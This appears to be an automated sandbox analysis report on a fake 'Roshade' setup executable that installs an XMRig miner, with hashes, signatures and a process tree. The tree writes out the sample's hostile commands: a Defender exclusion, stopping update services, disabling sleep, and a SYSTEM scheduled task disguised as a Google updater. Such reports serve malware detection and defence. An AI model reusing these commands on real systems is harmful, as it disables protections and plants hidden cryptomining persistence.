Resubmissions

25/08/2023, 13:21

230825-ql5hkaca48 10

25/08/2023, 13:18

230825-qj2znadg5w 10

Analysis

  • max time kernel
    151s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230703-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25/08/2023, 13:21

General

  • Target

    Roshade.Setup.3.3.1.exe - Archive.exe

  • Size

    781KB

  • MD5

    34b3d82fe220ad1b6a93a68c903f9b86

  • SHA1

    c0b085af680a927e8c8bba8400904fc37c9b681e

  • SHA256

    6bc198921d872252f6e3b2c088f59c2c38460886b8438780d76d2453a97b4008

  • SHA512

    edf8749d04dce834a7f4aa57910462a2706932170cde091fbac8eeaf3e42da6b94c67e314dc532f37450e663fd8200933bd8e315e525ab21092251544f979207

  • SSDEEP

    24576:oY0d/kaCUc9Fd89fgOfzScpL4Jfo3W04G:zWkaCUIFd89fgOfzScpL4W3W04G

Score
10/10

Malware Config

Signatures

  • Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 9 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Stops running service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 3 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3164
      • C:\Users\Admin\AppData\Local\Temp\Roshade.Setup.3.3.1.exe - Archive.exe
        "C:\Users\Admin\AppData\Local\Temp\Roshade.Setup.3.3.1.exe - Archive.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in Drivers directory
        • Drops file in Program Files directory
        • Suspicious behavior: EnumeratesProcesses
        PID:4148
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4412
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4948
        • C:\Windows\System32\sc.exe
          sc stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:5072
        • C:\Windows\System32\sc.exe
          sc stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:3856
        • C:\Windows\System32\sc.exe
          sc stop wuauserv
          3⤵
          • Launches sc.exe
          PID:2200
        • C:\Windows\System32\sc.exe
          sc stop bits
          3⤵
          • Launches sc.exe
          PID:4356
        • C:\Windows\System32\sc.exe
          sc stop dosvc
          3⤵
          • Launches sc.exe
          PID:912
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1264
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:4796
        • C:\Windows\System32\powercfg.exe
          powercfg /x -hibernate-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2220
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-ac 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2204
        • C:\Windows\System32\powercfg.exe
          powercfg /x -standby-timeout-dc 0
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1160
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xvcmyy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:368
      • C:\Windows\System32\schtasks.exe
        C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
        2⤵
          PID:3444
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          PID:4548
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1724
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:812
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:400
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:2656
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:1560
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:624
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3384
          • C:\Windows\System32\powercfg.exe
            powercfg /x -hibernate-timeout-ac 0
            3⤵
              PID:3840
            • C:\Windows\System32\powercfg.exe
              powercfg /x -hibernate-timeout-dc 0
              3⤵
                PID:3212
              • C:\Windows\System32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                3⤵
                  PID:3484
                • C:\Windows\System32\powercfg.exe
                  powercfg /x -standby-timeout-dc 0
                  3⤵
                    PID:3576
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xvcmyy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                  2⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3344
                • C:\Windows\System32\conhost.exe
                  C:\Windows\System32\conhost.exe
                  2⤵
                    PID:4268
                  • C:\Windows\explorer.exe
                    C:\Windows\explorer.exe
                    2⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:944
                • C:\Program Files\Google\Chrome\updater.exe
                  "C:\Program Files\Google\Chrome\updater.exe"
                  1⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Drops file in Drivers directory
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:380

                Network

                MITRE ATT&CK Enterprise v15

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Program Files\Google\Chrome\Update\fyKW2XVRgIImRthkP39sjXjcJ628DxiU.png

                  Filesize

                  10.0MB

                  MD5

                  ebe17ab6fba0d1e7f12de1861274110c

                  SHA1

                  5e46a4151f87f7df7a34f7e66946b09a455b2435

                  SHA256

                  4a59a43d54dccfd5cda78b4331a9840410e5ce9d564c8cd0f8d81cd25aa746e3

                  SHA512

                  6ce5ca617aed0332b9266fc4d2587e4be71a1eb31eec767084c28402e5866d2fbb3e69237017060dfb431936f6ee110c935d65373651da87a5bed07706aa23c3

                • C:\Program Files\Google\Chrome\updater.exe

                  Filesize

                  781KB

                  MD5

                  34b3d82fe220ad1b6a93a68c903f9b86

                  SHA1

                  c0b085af680a927e8c8bba8400904fc37c9b681e

                  SHA256

                  6bc198921d872252f6e3b2c088f59c2c38460886b8438780d76d2453a97b4008

                  SHA512

                  edf8749d04dce834a7f4aa57910462a2706932170cde091fbac8eeaf3e42da6b94c67e314dc532f37450e663fd8200933bd8e315e525ab21092251544f979207

                • C:\Program Files\Google\Chrome\updater.exe

                  Filesize

                  781KB

                  MD5

                  34b3d82fe220ad1b6a93a68c903f9b86

                  SHA1

                  c0b085af680a927e8c8bba8400904fc37c9b681e

                  SHA256

                  6bc198921d872252f6e3b2c088f59c2c38460886b8438780d76d2453a97b4008

                  SHA512

                  edf8749d04dce834a7f4aa57910462a2706932170cde091fbac8eeaf3e42da6b94c67e314dc532f37450e663fd8200933bd8e315e525ab21092251544f979207

                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  2KB

                  MD5

                  d85ba6ff808d9e5444a4b369f5bc2730

                  SHA1

                  31aa9d96590fff6981b315e0b391b575e4c0804a

                  SHA256

                  84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                  SHA512

                  8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  944B

                  MD5

                  62623d22bd9e037191765d5083ce16a3

                  SHA1

                  4a07da6872672f715a4780513d95ed8ddeefd259

                  SHA256

                  95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

                  SHA512

                  9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ig5yyg5v.4yo.ps1

                  Filesize

                  60B

                  MD5

                  d17fe0a3f47be24a6453e9ef58c94641

                  SHA1

                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                  SHA256

                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                  SHA512

                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                • C:\Windows\System32\drivers\etc\hosts

                  Filesize

                  3KB

                  MD5

                  00930b40cba79465b7a38ed0449d1449

                  SHA1

                  4b25a89ee28b20ba162f23772ddaf017669092a5

                  SHA256

                  eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01

                  SHA512

                  cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                  Filesize

                  4KB

                  MD5

                  bdb25c22d14ec917e30faf353826c5de

                  SHA1

                  6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

                  SHA256

                  e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

                  SHA512

                  b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

                • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                  Filesize

                  1KB

                  MD5

                  b42c70c1dbf0d1d477ec86902db9e986

                  SHA1

                  1d1c0a670748b3d10bee8272e5d67a4fabefd31f

                  SHA256

                  8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

                  SHA512

                  57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

                • memory/368-28-0x000001FADC1D0000-0x000001FADC1E0000-memory.dmp

                  Filesize

                  64KB

                • memory/368-27-0x000001FADC1D0000-0x000001FADC1E0000-memory.dmp

                  Filesize

                  64KB

                • memory/368-26-0x00007FFE4F6D0000-0x00007FFE50191000-memory.dmp

                  Filesize

                  10.8MB

                • memory/368-39-0x000001FADC1D0000-0x000001FADC1E0000-memory.dmp

                  Filesize

                  64KB

                • memory/368-41-0x000001FADC1D0000-0x000001FADC1E0000-memory.dmp

                  Filesize

                  64KB

                • memory/368-43-0x00007FFE4F6D0000-0x00007FFE50191000-memory.dmp

                  Filesize

                  10.8MB

                • memory/380-50-0x0000000000400000-0x00000000004BB000-memory.dmp

                  Filesize

                  748KB

                • memory/380-51-0x0000000000E50000-0x0000000001828000-memory.dmp

                  Filesize

                  9.8MB

                • memory/380-49-0x0000000000E50000-0x0000000001828000-memory.dmp

                  Filesize

                  9.8MB

                • memory/380-119-0x0000000000400000-0x00000000004BB000-memory.dmp

                  Filesize

                  748KB

                • memory/944-129-0x0000000000F70000-0x0000000000F90000-memory.dmp

                  Filesize

                  128KB

                • memory/944-126-0x0000000000F70000-0x0000000000F90000-memory.dmp

                  Filesize

                  128KB

                • memory/944-128-0x00007FF6AA2D0000-0x00007FF6AAABF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/944-131-0x00007FF6AA2D0000-0x00007FF6AAABF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/944-133-0x00007FF6AA2D0000-0x00007FF6AAABF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/944-125-0x00007FF6AA2D0000-0x00007FF6AAABF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/944-123-0x00007FF6AA2D0000-0x00007FF6AAABF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/944-121-0x00000000015A0000-0x00000000015E0000-memory.dmp

                  Filesize

                  256KB

                • memory/944-120-0x0000000000F00000-0x0000000000F20000-memory.dmp

                  Filesize

                  128KB

                • memory/944-135-0x00007FF6AA2D0000-0x00007FF6AAABF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/944-137-0x00007FF6AA2D0000-0x00007FF6AAABF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/944-139-0x00007FF6AA2D0000-0x00007FF6AAABF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/944-141-0x00007FF6AA2D0000-0x00007FF6AAABF000-memory.dmp

                  Filesize

                  7.9MB

                • memory/3344-112-0x00000297ED210000-0x00000297ED220000-memory.dmp

                  Filesize

                  64KB

                • memory/3344-91-0x00000297ED210000-0x00000297ED220000-memory.dmp

                  Filesize

                  64KB

                • memory/3344-114-0x00007FFE50E80000-0x00007FFE51941000-memory.dmp

                  Filesize

                  10.8MB

                • memory/3344-102-0x00007FF4EC330000-0x00007FF4EC340000-memory.dmp

                  Filesize

                  64KB

                • memory/3344-90-0x00007FFE50E80000-0x00007FFE51941000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4148-5-0x0000000000400000-0x00000000004BB000-memory.dmp

                  Filesize

                  748KB

                • memory/4148-6-0x00000000024A0000-0x0000000002E7C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/4148-45-0x0000000000400000-0x00000000004BB000-memory.dmp

                  Filesize

                  748KB

                • memory/4148-4-0x00000000024A0000-0x0000000002E7C000-memory.dmp

                  Filesize

                  9.9MB

                • memory/4268-127-0x00007FF6EA410000-0x00007FF6EA43A000-memory.dmp

                  Filesize

                  168KB

                • memory/4268-122-0x00007FF6EA410000-0x00007FF6EA43A000-memory.dmp

                  Filesize

                  168KB

                • memory/4412-12-0x0000018EBBB10000-0x0000018EBBB32000-memory.dmp

                  Filesize

                  136KB

                • memory/4412-17-0x00007FFE4F6D0000-0x00007FFE50191000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4412-18-0x0000018EBBB80000-0x0000018EBBB90000-memory.dmp

                  Filesize

                  64KB

                • memory/4412-19-0x0000018EBBB80000-0x0000018EBBB90000-memory.dmp

                  Filesize

                  64KB

                • memory/4412-20-0x0000018EBBB80000-0x0000018EBBB90000-memory.dmp

                  Filesize

                  64KB

                • memory/4412-23-0x00007FFE4F6D0000-0x00007FFE50191000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4548-74-0x0000029079B40000-0x0000029079B5C000-memory.dmp

                  Filesize

                  112KB

                • memory/4548-76-0x0000029079D90000-0x0000029079DAC000-memory.dmp

                  Filesize

                  112KB

                • memory/4548-53-0x00000290776D0000-0x00000290776E0000-memory.dmp

                  Filesize

                  64KB

                • memory/4548-52-0x00007FFE50E80000-0x00007FFE51941000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4548-83-0x00000290776D0000-0x00000290776E0000-memory.dmp

                  Filesize

                  64KB

                • memory/4548-80-0x0000029079D80000-0x0000029079D88000-memory.dmp

                  Filesize

                  32KB

                • memory/4548-64-0x00007FF490290000-0x00007FF4902A0000-memory.dmp

                  Filesize

                  64KB

                • memory/4548-54-0x00000290776D0000-0x00000290776E0000-memory.dmp

                  Filesize

                  64KB

                • memory/4548-75-0x0000029079C20000-0x0000029079C2A000-memory.dmp

                  Filesize

                  40KB

                • memory/4548-86-0x00007FFE50E80000-0x00007FFE51941000-memory.dmp

                  Filesize

                  10.8MB

                • memory/4548-79-0x0000029079DD0000-0x0000029079DEA000-memory.dmp

                  Filesize

                  104KB

                • memory/4548-78-0x0000029079D70000-0x0000029079D7A000-memory.dmp

                  Filesize

                  40KB

                • memory/4548-82-0x0000029079DC0000-0x0000029079DCA000-memory.dmp

                  Filesize

                  40KB

                • memory/4548-81-0x0000029079DB0000-0x0000029079DB6000-memory.dmp

                  Filesize

                  24KB